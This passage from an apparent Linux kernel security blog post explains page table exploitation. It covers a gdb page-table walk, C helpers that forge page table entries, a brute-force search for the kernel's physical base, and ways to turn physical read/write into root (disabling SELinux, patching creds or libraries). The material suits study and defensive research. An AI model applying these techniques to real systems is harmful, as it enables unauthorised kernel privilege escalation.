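<p>Here&rsquo;s a similar sketch for huge page entries, showing how the <code>PS</code> bit and the shrinking address field fit together. As before, it assumes x86_64 with <code>M = 52</code>; the enum, helper names and example entry are hypothetical.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdint.h&gt;
#include &lt;stdio.h&gt;

#define ENTRY_PS (1ULL &lt;&lt; 7) /* Page Size bit in PMD/PUD entries */

/* Address fields for huge mappings. Assumption: M = 52. */
#define PMD_HUGE_ADDR_MASK 0x000fffffffe00000ULL /* bits 21-51, 2MB aligned */
#define PUD_HUGE_ADDR_MASK 0x000fffffc0000000ULL /* bits 30-51, 1GB aligned */

enum level { LEVEL_PMD, LEVEL_PUD }; /* made up for this sketch */

/* Does this PMD/PUD entry map a huge page rather than a lower table? */
static int is_huge(uint64_t entry)
{
    return (entry &amp; ENTRY_PS) != 0;
}

static uint64_t huge_page_size(enum level lvl)
{
    return lvl == LEVEL_PMD ? (1ULL &lt;&lt; 21) : (1ULL &lt;&lt; 30);
}

/* Physical base address of the huge page mapped by this entry. */
static uint64_t huge_phys_base(uint64_t entry, enum level lvl)
{
    return entry &amp; (lvl == LEVEL_PMD ? PMD_HUGE_ADDR_MASK : PUD_HUGE_ADDR_MASK);
}

int main(void)
{
    /* Made-up PMD entry: PS set, present, writable, user, accessed, dirty, NX. */
    uint64_t pmd = 0x80000000402000e7ULL;

    if (is_huge(pmd))
        printf(&#34;2MB page at phys 0x%llx (size 0x%llx)\n&#34;,
               (unsigned long long)huge_phys_base(pmd, LEVEL_PMD),
               (unsigned long long)huge_page_size(LEVEL_PMD));
    return 0;
}
</code></pre></div>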
<h4 id="going-for-a-walk">Going For A Walk</h4>
<p>So far this has all been quite abstract, so, if you&rsquo;ll indulge me, let&rsquo;s go for a quick (page table) walk. We&rsquo;ll take all the paging internals we&rsquo;ve picked up so far and do some debugging in order to get hands on and confirm what we&rsquo;ve learned.</p>
<p>For our little walk, I&rsquo;m going to use the following program to setup an interesting virtual address space to explore via kernel debugging:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="cp">#define PAGE_SIZE (0x1000UL)
</span></span></span><span class="line"><span class="cl"><span class="cp">#define PT_SIZE (512 * PAGE_SIZE) </span><span class="c1">// 0x200000
</span></span></span><span class="line"><span class="cl"><span class="cp">#define PMD_SIZE (512 * PT_SIZE)  </span><span class="c1">// 0x40000000
</span></span></span><span class="line"><span class="cl"><span class="cp">#define PUD_SIZE (512 * PMD_SIZE) </span><span class="c1">// 0x8000000000
</span></span></span><span class="line"><span class="cl"><span class="cp">#define PGD_SIZE (512 * PUD_SIZE) </span><span class="c1">// 0x1000000000000
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="nf">open</span><span class="p">(</span><span class="s">&#34;test.txt&#34;</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">mmap</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)(</span><span class="n">PUD_SIZE</span> <span class="o">+</span> <span class="n">PMD_SIZE</span> <span class="o">+</span> <span class="n">PT_SIZE</span><span class="p">),</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_FIXED</span> <span class="o">|</span> <span class="n">MAP_POPULATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">mmap</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)(</span><span class="n">PUD_SIZE</span> <span class="o">+</span> <span class="n">PMD_SIZE</span> <span class="o">+</span> <span class="n">PT_SIZE</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span><span class="p">),</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_FIXED</span> <span class="o">|</span> <span class="n">MAP_POPULATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">mmap</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)(</span><span class="n">PUD_SIZE</span> <span class="o">+</span> <span class="n">PMD_SIZE</span> <span class="o">+</span> <span class="n">PT_SIZE</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span><span class="p">),</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_FIXED</span> <span class="o">|</span> <span class="n">MAP_POPULATE</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">getchar</span><span class="p">();</span> <span class="c1">// pause program so i can set a bp to trigger on the next mmap()
</span></span></span><span class="line"><span class="cl">    <span class="nf">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>Note: MAP_POPULATE is used to make sure the tables are populated on mmap()ing them</p>
<p>The aim of this little program is to create three mappings, with slightly different permissions and attributes, at a fixed location. Why a fixed location?</p>
<p>Because as we&rsquo;ve learned, the virtual address space is directly reflected by its page tables. So by using a fixed address we can calculate exactly which PT our page entries will be in.</p>
<p>To make this a little easier, I created some macros to define the size each page table level spans. So, as the virtual address space is reflected directly by the page tables, we know that virtual address <code>0x0</code> is going to be mapped by <code>PGD[0][0][0][0]</code> - where the first index is the PGD entry, then that PUD entry, that PMD entry and finally that PT entry.</p>
<p>So if we map at fixed address <code>PUD_SIZE + PMD_SIZE + PT_SIZE</code> we&rsquo;re offsetting it by exactly one PUD, one PMD and one PT. So we should find it at <code>PGD[1][1][1][0]</code>.</p>
<p>We can also do it the technical way and explore the bits of the address. <code>PUD_SIZE + PMD_SIZE + PT_SIZE == 0x8040200000</code>. Let&rsquo;s check out the bits:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Bit:  63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32
</span></span><span class="line"><span class="cl">Val:   0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">Bit:  31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10  9  8  7  6  5  4  3  2  1  0
</span></span><span class="line"><span class="cl">Val:   0  1  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0
</span></span></code></pre></div><p>In the paging primer earlier we showed that the entry offsets for the PGD, PUD, PMD, PT were stored in bits <code>39-47</code>, <code>30-38</code>, <code>21-29</code> and <code>12-20</code> respectively.  Here we can see those values correspond to <code>1</code>, <code>1</code>, <code>1</code> and <code>0</code>. The same as our previous guess!</p>
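<p>To make the bit-twiddling concrete, here&rsquo;s a minimal C sketch of the same decomposition. It assumes 4-level paging with 4KiB pages on x86_64 (as in the primer); the <code>VA_*</code> macros, <code>struct pt_indices</code> and <code>split_vaddr()</code> are names made up for illustration and aren&rsquo;t part of the test program or the kernel:</p>

```c
#include <stdint.h>

/* Each table level is indexed by 9 bits of the virtual address
 * (assumption: 4-level paging, 4KiB pages). */
#define VA_INDEX_MASK 0x1ffULL
#define VA_PGD_SHIFT  39 /* bits 39-47 */
#define VA_PUD_SHIFT  30 /* bits 30-38 */
#define VA_PMD_SHIFT  21 /* bits 21-29 */
#define VA_PT_SHIFT   12 /* bits 12-20 */

/* Hypothetical helper type: one index per page table level. */
struct pt_indices {
    unsigned pgd, pud, pmd, pt;
};

/* Split a virtual address into its four page table indices. */
static struct pt_indices split_vaddr(uint64_t vaddr)
{
    struct pt_indices idx = {
        .pgd = (unsigned)((vaddr >> VA_PGD_SHIFT) & VA_INDEX_MASK),
        .pud = (unsigned)((vaddr >> VA_PUD_SHIFT) & VA_INDEX_MASK),
        .pmd = (unsigned)((vaddr >> VA_PMD_SHIFT) & VA_INDEX_MASK),
        .pt  = (unsigned)((vaddr >> VA_PT_SHIFT) & VA_INDEX_MASK),
    };
    return idx;
}
```

<p>Feeding it <code>0x8040200000</code> gives the indices 1, 1, 1 and 0, matching the bit table above; adding <code>0x1000</code> or <code>0x2000</code> to the address only bumps the PT index to 1 or 2.</p>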
<p>Note that the next two mappings are each offset by <code>PAGE_SIZE</code>, i.e. one PT entry, so they should form 3 contiguous PT entries.</p>
<p>This is all still theoretical though, so let&rsquo;s put our money where our mouth is. I set up a kernel debugging environment <a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging">using gdb and x86_64 QEMU</a>. The plan is to:</p>
<ul>
<li>Run this program on the guest</li>
<li>When it pauses at <code>getchar()</code>, set a breakpoint in gdb at <code>vm_area_alloc(mm)</code></li>
<li>Continue the program, hit the breakpoint. We now, lazily, have a reference to our process&rsquo;s <code>mm_struct</code> which contains a pointer to its PGD. We can now walk our PGD and find our entries!</li>
</ul>
<p>And, just like that, we can dump our process&rsquo;s PGD:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) x/10gx mm-&gt;pgd
</span></span><span class="line"><span class="cl">0xffff888106b50000:     0x8000000100172067      0x8000000102c9b067
</span></span><span class="line"><span class="cl">0xffff888106b50010:     0x0000000000000000      0x0000000000000000
</span></span><span class="line"><span class="cl">0xffff888106b50020:     0x0000000000000000      0x0000000000000000
</span></span></code></pre></div><p>Great, so far so good. We can see <code>PGD[1]</code> is populated with <code>0x8000000102c9b067</code>. To find the address of the PUD this entry points to, we need to clear the metadata. This, for us, is bits 0:11 and 48:63. We can remove this with a simple mask: <code>0x8000000102c9b067 &amp; 0x0000FFFFFFFFF000 = 0x102C9B000</code>.</p>
<p>Awesome, so now we can move onto our PUD&hellip;</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) x/10gx 0x102C9B000
</span></span><span class="line"><span class="cl">0x102c9b000:    Cannot access memory at address 0x102c9b000
</span></span></code></pre></div><p>Ah wait, that&rsquo;s a physical address right, and gdb is dealing with virtual addresses. Not to worry! Fortunately, the <a href="https://sam4k.com/linternals-virtual-memory-part-3/">kernel virtual address space</a> includes a direct mapping of all physical memory (physmap). For x86_64 this is at <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/page_64_types.h#L45">__PAGE_OFFSET</a>, <code>0xffff888000000000</code>.</p>
<p>Sooo if that&rsquo;s the kernel virtual address mapped to the start of physical memory, we just need to offset that by our physical address and we should see our PUD&hellip;</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) x/2gx (0xffff888000000000 + 0x102c9b000)
</span></span><span class="line"><span class="cl">0xffff888102c9b000:     0x0000000000000000      0x000000010436d067
</span></span></code></pre></div><p>Voila! And again, as expected, we have our entry at <code>PGD[1][1]</code>. Let&rsquo;s keep going:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) x/2gx (0xffff888000000000 + (0x000000010436d067 &amp; 0x0000FFFFFFFFF000))
</span></span><span class="line"><span class="cl">0xffff88810436d000:     0x0000000000000000      0x0000000101346067
</span></span></code></pre></div><p>Now we&rsquo;re into the PMD and as expected, we see <code>PGD[1][1][1]</code> populated. The next step is the PT, where we should see three entries with slightly different permissions:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) x/4gx (0xffff888000000000 + (0x0000000101346067 &amp; 0x0000FFFFFFFFF000))
</span></span><span class="line"><span class="cl">0xffff888101346000:     0x8000000107422067      0x80000000034ff225
</span></span><span class="line"><span class="cl">0xffff888101346010:     0x800000010743c025      0x0000000000000000
</span></span></code></pre></div><p>And just like that we&rsquo;ve walked our <code>mm</code>&rsquo;s PGD all the way down to a specific PT, containing our 3 mappings: R/W anonymous mapping, RO anonymous mapping and finally a RO file. Sweet!</p>
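<p>Every step of that walk was the same two operations: mask off the metadata bits, then add the physmap base. Here&rsquo;s a rough sketch of that, assuming the mask and the un-randomised <code>__PAGE_OFFSET</code> used in this walk (the macro and helper names are hypothetical, and on a kernel with memory KASLR enabled the physmap base will be different):</p>

```c
#include <stdint.h>

/* Assumptions taken from the gdb session above, not universal constants. */
#define PHYSMAP_BASE    0xffff888000000000ULL /* __PAGE_OFFSET without KASLR */
#define ENTRY_ADDR_MASK 0x0000fffffffff000ULL /* clears bits 0:11 and 48:63 */
#define ENTRY_SIZE      8ULL                  /* each table entry is 8 bytes */

/* Physical address of the table (or page) a page table entry points at. */
static uint64_t entry_to_phys(uint64_t entry)
{
    return entry & ENTRY_ADDR_MASK;
}

/* Kernel virtual address of a physical address via the direct mapping. */
static uint64_t phys_to_physmap(uint64_t phys)
{
    return PHYSMAP_BASE + phys;
}

/* Kernel virtual address of entry `index` in the table `entry` points at. */
static uint64_t entry_vaddr(uint64_t entry, unsigned index)
{
    return phys_to_physmap(entry_to_phys(entry)) + (uint64_t)index * ENTRY_SIZE;
}
```

<p>For example, <code>entry_vaddr(0x8000000102c9b067, 1)</code> comes out at <code>0xffff888102c9b008</code>, which is exactly where gdb showed us the PUD entry <code>0x000000010436d067</code>.</p>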
<p>I&rsquo;ll leave the examining of the various attributes, using the PTE diagram from the previous section, as an exercise to any interested readers, as I fear I&rsquo;ve sidetracked enough. The main goal of this little adventure is to demonstrate how you can get some hands on debugging and poke around to help build your understanding, as it can be vital when working on complex exploitation techniques like this!</p>
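<p>If you do have a go at that exercise and want to check your answers, the architectural x86_64 flag bits can be pulled out with a few masks. This sketch only covers a handful of bits (present, writable, user, accessed, dirty, no-execute) and ignores the software-defined ones; the <code>PTE_*</code> names and <code>decode_pte()</code> are mine for illustration, not the kernel&rsquo;s:</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* Architectural x86_64 page table entry flag bits. */
#define PTE_PRESENT  (1ULL << 0)
#define PTE_WRITE    (1ULL << 1)
#define PTE_USER     (1ULL << 2)
#define PTE_ACCESSED (1ULL << 5)
#define PTE_DIRTY    (1ULL << 6)
#define PTE_NX       (1ULL << 63)

/* Hypothetical helper type holding the decoded flags. */
struct pte_flags {
    bool present, writable, user, accessed, dirty, no_exec;
};

/* Decode a raw 64-bit PTE value into individual flags. */
static struct pte_flags decode_pte(uint64_t pte)
{
    struct pte_flags f = {
        .present  = (pte & PTE_PRESENT) != 0,
        .writable = (pte & PTE_WRITE) != 0,
        .user     = (pte & PTE_USER) != 0,
        .accessed = (pte & PTE_ACCESSED) != 0,
        .dirty    = (pte & PTE_DIRTY) != 0,
        .no_exec  = (pte & PTE_NX) != 0,
    };
    return f;
}
```

<p>Run against the three PT entries from the dump, only the first (<code>0x8000000107422067</code>) has the writable bit set, which lines up with it being our R/W anonymous mapping.</p>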
<p>Now, where were we - weighing up our options for exploitation if we have some level of control over a page table&hellip;</p>
<h4 id="approaches">Approaches</h4>
<p>So, depending on our primitive, here are a couple of options we might consider:</p>
<ul>
<li>Overwriting the address bits (and maybe the Page Size bit for PUD/PMD entries) to gain arbitrary physical address R/W (note, we&rsquo;ll discuss phys KASLR later).</li>
<li>Overwriting permissions bits to gain R/W on a privileged file that is mapped into our process&rsquo;s virtual address space as read-only.</li>
</ul>
<p>Using our kernel AAW we could: disable SELinux, using one of the techniques outlined <a href="https://klecko.github.io/posts/selinux-bypasses">here</a>, such as overwriting the <code>selinux_state</code> singleton<a href="https://klecko.github.io/posts/selinux-bypasses/#bypass-1-disable-selinux">[3]</a><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#disable-selinux">[4]</a>; patch the kernel to gain root (e.g. <code>setresuid()</code>, <code>setresgid()</code>)<a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#step3-patch-the-kernel">[5]</a><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606#Escaping-from-nsjail">[6]</a>; overwrite <code>modprobe_path</code> because that&rsquo;s sometimes still a thing<a href="https://sam4k.com/like-techniques-modprobe_path/">[7]</a>; follow the linked list of tasks from <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched/task.h#L58"><code>init_task</code></a> to elevate the privileges of your own <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/cred.h#L111"><code>cred</code></a>s or forge <code>init</code>&rsquo;s etc. The world is our oyster (if our primitive is flexible enough&hellip;)!</p>
<p>As for files we might want to target, we could: patch shared libraries used by privileged processes to gain a reverse shell<a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#inject-code-into-libbaseso">[8]</a><a href="https://github.com/polygraphene/DirtyPipe-Android/blob/master/TECHNICAL-DETAILS.md#exploit-process">[9]</a><a href="https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive">[10]</a>; patch SUID binaries to gain a privileged shell etc.</p>
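<p>Both of the approaches listed above boil down to some simple bit manipulation on an entry we control. As a minimal sketch, assuming x86_64 and the same address mask used in the debugging walk earlier (the helper names are hypothetical, and how the forged value actually gets written into the page table depends entirely on your primitive):</p>

```c
#include <stdint.h>

#define PTE_WRITE     (1ULL << 1)           /* R/W permission bit */
#define PTE_ADDR_MASK 0x0000fffffffff000ULL /* address bits, per the walk */

/* Approach 1: keep the flags, swap the address bits so the entry
 * points at a physical page of our choosing. */
static uint64_t pte_retarget(uint64_t pte, uint64_t phys)
{
    return (pte & ~PTE_ADDR_MASK) | (phys & PTE_ADDR_MASK);
}

/* Approach 2: keep the address, set the write bit on a read-only entry. */
static uint64_t pte_make_writable(uint64_t pte)
{
    return pte | PTE_WRITE;
}
```

<p>Using the entries from our earlier dump: retargeting the R/W entry <code>0x8000000107422067</code> at physical address <code>0x1000000</code> gives <code>0x8000000001000067</code>, and making the read-only file entry <code>0x800000010743c025</code> writable gives <code>0x800000010743c027</code>.</p>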
<h4 id="on-caching">On Caching</h4>
<p>Before we get giddy with power, beyond the limitations of our primitive, there are a few other things to consider: mitigations (which I&rsquo;ll cover in the next section) and caching.</p>
<p>So far we&rsquo;ve covered paging at a reasonably high level: the process of translating a virtual address to the correct physical address involves walking the appropriate page tables using the bits found in the virtual address.</p>
<p>This address translation is offloaded to the hardware and is the job of the Memory Management Unit (MMU). As you might imagine, this can get computationally expensive when you scale things up and also inefficient if we&rsquo;re constantly accessing the same pages of memory.</p>
<p>To address this, the hardware makes use of various caches, storing address translations (the primary cache for this being the Translation Lookaside Buffer (TLB)) and pages.  </p>
<p>If we start messing with page table entries or pages, in order for the hardware to actually see these changes, we need to flush the appropriate caches so they&rsquo;re updated with <em>our</em> version.</p>
<p>Of the write-ups I&rsquo;ve mentioned so far, the <a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Pagetable article</a> has a <a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#61-how-to-flush-tlb-and-page-table-caches">section</a> on this for aarch64 and the <a href="https://pwning.tech/nftables/">Flipping Pages article</a> has a <a href="https://pwning.tech/nftables/#47-tlb-flushing">section</a> relevant to x86_64.</p>
<hr>
<ol>
<li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/gfp.h#L16">https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/gfp.h#L16</a></li>
<li><a href="https://lwn.net/Articles/619514/">https://lwn.net/Articles/619514/</a></li>
<li><a href="https://klecko.github.io/posts/selinux-bypasses/#bypass-1-disable-selinux">https://klecko.github.io/posts/selinux-bypasses/#bypass-1-disable-selinux</a></li>
<li><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#disable-selinux">https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#disable-selinux</a> (aarch64)</li>
<li><a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#step3-patch-the-kernel">https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html#step3-patch-the-kernel</a> (aarch64)</li>
<li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606#Escaping-from-nsjail">https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606#Escaping-from-nsjail</a> (x86_64)</li>
<li><a href="https://sam4k.com/like-techniques-modprobe_path/">https://sam4k.com/like-techniques-modprobe_path/</a></li>
<li><a href="https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#inject-code-into-libbaseso">https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/#inject-code-into-libbaseso</a> (aarch64)</li>
<li><a href="https://github.com/polygraphene/DirtyPipe-Android/blob/master/TECHNICAL-DETAILS.md#exploit-process">https://github.com/polygraphene/DirtyPipe-Android/blob/master/TECHNICAL-DETAILS.md#exploit-process</a> (aarch64)</li>
<li><a href="https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive">https://starlabs.sg/blog/2025/12-mali-cious-intent-exploiting-gpu-vulnerabilities-cve-2022-22706/#exploitation-primitive</a> (aarch64)</li>
</ol>
<h2 id="mitigations">Mitigations</h2>
<p><img src="https://sam4k.com/content/images/2025/05/fun_time_is_over.gif" alt=""></p>
<p>Alright, we&rsquo;ve had our fun, now it&rsquo;s time to face reality: mitigations. Of course, one of the perks of page table exploitation is that it sidesteps many of the more common mitigations: virtual KASLR, CFI, random kmalloc caches and other heap mitigations, and it doesn&rsquo;t rely on <code>modprobe_path</code>; not to mention the permissions set up by page tables to protect memory accesses via virtual addresses. However, that&rsquo;s not to say there&rsquo;s <em>nothing</em> to worry about.</p>
<h3 id="physical-kaslr">Physical KASLR</h3>
<p>As I mentioned earlier, usually when we&rsquo;re talking about Kernel Address Space Layout Randomisation (KASLR), we&rsquo;re referring to kernel virtual address randomisation. However, as we&rsquo;re dealing with physical addresses, we&rsquo;re interested in physical KASLR.</p>
<p><a href="https://cateee.net/lkddb/web-lkddb/RANDOMIZE_BASE.html"><code>CONFIG_RANDOMIZE_BASE</code></a> is the kernel config option that enables randomising the address of the kernel image (KASLR). Below is the description for the x86_64 option:</p>
<blockquote>
<p>In support of Kernel Address Space Layout Randomization (KASLR), this randomizes the physical address at which the kernel image is decompressed and the virtual address where the kernel image is mapped, as a security feature that deters exploit attempts relying on knowledge of the location of kernel code internals.</p>
<p><strong>On 64-bit, the kernel physical and virtual addresses are randomized separately.</strong></p>
</blockquote>
<p>Now, let&rsquo;s look at the aarch64 description:</p>
<blockquote>
<p>Randomizes <strong>the virtual address</strong> at which the kernel image is loaded, as a security feature that deters exploit attempts relying on knowledge of the location of kernel internals.</p>
</blockquote>
<p>As far as I understand it, there is no upstream support for physical KASLR on aarch64. That said, if you&rsquo;re on Android, you&rsquo;re not out of the woods yet - Samsung have their own physical KASLR implementation, so don&rsquo;t stop reading just yet.</p>
<p>For x86_64, the kernel&rsquo;s physical base address is aligned to <a href="https://cateee.net/lkddb/web-lkddb/PHYSICAL_START.html"><code>CONFIG_PHYSICAL_START</code></a> (default being <code>0x1000000</code>). However, the physical address alignment can be explicitly defined by <a href="https://cateee.net/lkddb/web-lkddb/PHYSICAL_ALIGN.html"><code>CONFIG_PHYSICAL_ALIGN</code></a>, which is typically set to <code>0x200000</code> (which is the minimum value on x86_64).</p>
<p>Sooo how we approach this is going to be dependent on our primitive and whether we have control of a PT, PMD, PUD etc. But failing any context-specific leaks, the most straightforward approach is simply brute forcing the available physical memory: taking advantage of the alignment restrictions, we read the possible base addresses looking for known signatures, either by updating PT entries or by mapping huge pages of physical memory and doing it that way.</p>
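<p>The brute force itself is just a loop over aligned candidates. Below is a rough sketch, assuming the typical <code>0x200000</code> alignment mentioned above. Everything else is hypothetical: <code>phys_read_fn</code> stands in for whatever physical read your primitive gives you, the signature bytes are left to the caller, and <code>fake_read()</code> only exists so the loop can be tried out off-target:</p>

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PHYS_ALIGN 0x200000ULL /* assumed CONFIG_PHYSICAL_ALIGN */

/* Hypothetical primitive: copy len bytes at physical address phys into
 * buf, returning 0 on success. */
typedef int (*phys_read_fn)(uint64_t phys, void *buf, size_t len, void *ctx);

/* Scan aligned candidates in [start, end) for sig; UINT64_MAX if not found. */
static uint64_t find_kernel_phys_base(phys_read_fn read_phys, void *ctx,
                                      uint64_t start, uint64_t end,
                                      const void *sig, size_t sig_len)
{
    unsigned char buf[64];
    uint64_t base;

    if (sig_len == 0 || sig_len > sizeof(buf))
        return UINT64_MAX;

    /* Round the start up to the next aligned candidate. */
    base = (start + PHYS_ALIGN - 1) & ~(PHYS_ALIGN - 1);
    for (; base < end; base += PHYS_ALIGN) {
        if (read_phys(base, buf, sig_len, ctx) != 0)
            continue; /* unreadable candidate, try the next one */
        if (memcmp(buf, sig, sig_len) == 0)
            return base;
    }
    return UINT64_MAX;
}

/* Stand-in "physical memory" for off-target testing: a single location
 * holds data, everything else reads back as zeroes. */
struct fake_ram {
    uint64_t base;
    const unsigned char *data;
    size_t len;
};

static int fake_read(uint64_t phys, void *buf, size_t len, void *ctx)
{
    const struct fake_ram *ram = ctx;

    if (phys == ram->base && len <= ram->len)
        memcpy(buf, ram->data, len);
    else
        memset(buf, 0, len);
    return 0;
}
```

<p>On a real target each <code>read_phys()</code> call would mean pointing a PT entry (or a huge page mapping) at the candidate address and reading through it, so the fewer candidates the alignment leaves you with, the better.</p>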
<h3 id="read-only-memory">Read-Only Memory</h3>
<p>Another mitigation that can thwart our page-level shenanigans is the use of read-only memory. But Sam, I hear you ask, we&rsquo;re dealing directly with physical addresses here, who&rsquo;s going to stop us?! As we&rsquo;ve mentioned, typically these protections are done during virtual address translation, but we&rsquo;re bypassing that, so what gives?</p>
<p>An example of this is Samsung&rsquo;s Real-time Kernel Protection (RKP), a hypervisor implementation which is part of <a href="https://www.samsungknox.com/en">Samsung KNOX</a>. I don&rsquo;t want to get too off track here, but essentially the hypervisor runs at a higher privilege level than even the kernel.</p>
<p>Moreover, it uses a two-stage address translation to control how the kernel (and thus we) see physical memory. This essentially allows the hypervisor to mark memory as read-only so that even with our physical address read/write, a write can still be caught by the hypervisor as it&rsquo;s operating at a higher privilege. This is a gross simplification, so if you&rsquo;re interested in reading more, check out the awesome <a href="https://www.longterm.io/samsung_rkp.html">Samsung RKP Compendium</a>.</p>
<p>This can in turn be used to protect critical data structures such as SLAB caches (e.g. <code>cred_jar</code>), global variables, kernel page tables etc.</p>
<p>Note this isn&rsquo;t currently used (afaik) to protect user page tables, but it does narrow down the options available when exploiting the physical address read/write.</p>
<h2 id="resources">Resources</h2>
<p>Below is a list of all the resources I&rsquo;ve linked throughout the article and any extras that are relevant to the topic of page table exploitation (if you think I&rsquo;ve missed any, <a href="https://x.com/sam4k1">lmk</a>!):</p>
<ol>
<li><a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel</a> by <a href="https://x.com/NVamous">@NVamous</a> (2023) (aarch64) technique overview with 3 examples</li>
